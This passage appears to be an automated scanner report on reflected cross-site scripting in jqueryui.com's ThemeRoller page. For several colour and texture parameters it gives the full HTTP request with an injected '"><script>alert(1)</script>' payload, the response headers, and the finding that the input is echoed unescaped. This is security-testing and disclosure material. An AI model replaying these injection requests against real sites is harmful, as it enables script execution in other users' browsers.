GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0f15aa"><script>alert(1)</script>ffc4cddc3d9&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 870d8"><script>alert(1)</script>8356350c402 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0870d8"><script>alert(1)</script>8356350c402&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb024"><script>alert(1)</script>61029ab1dc6 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0bb024"><script>alert(1)</script>61029ab1dc6&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e69a"><script>alert(1)</script>1b69ddd11c1 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=08e69a"><script>alert(1)</script>1b69ddd11c1&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a86e"><script>alert(1)</script>86153e925ae was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=03a86e"><script>alert(1)</script>86153e925ae&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd2c"><script>alert(1)</script>14d61402d9b was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=06bd2c"><script>alert(1)</script>14d61402d9b&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3404"><script>alert(1)</script>60ea8a71583 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb3404"><script>alert(1)</script>60ea8a71583&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a515b"><script>alert(1)</script>de3e563a943 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.pnga515b"><script>alert(1)</script>de3e563a943&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a0b"><script>alert(1)</script>4f33de6bd13 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngd2a0b"><script>alert(1)</script>4f33de6bd13&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc88"><script>alert(1)</script>26ccc18bbb was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.pngcfc88"><script>alert(1)</script>26ccc18bbb&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120031
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc6ff"><script>alert(1)</script>7761c2c16e6 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.pngcc6ff"><script>alert(1)</script>7761c2c16e6&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92262"><script>alert(1)</script>3bf54c79764 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png92262"><script>alert(1)</script>3bf54c79764&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a97f7"><script>alert(1)</script>27d3858697 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnga97f7"><script>alert(1)</script>27d3858697&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120031
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f48c"><script>alert(1)</script>be4bd7ca47a was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
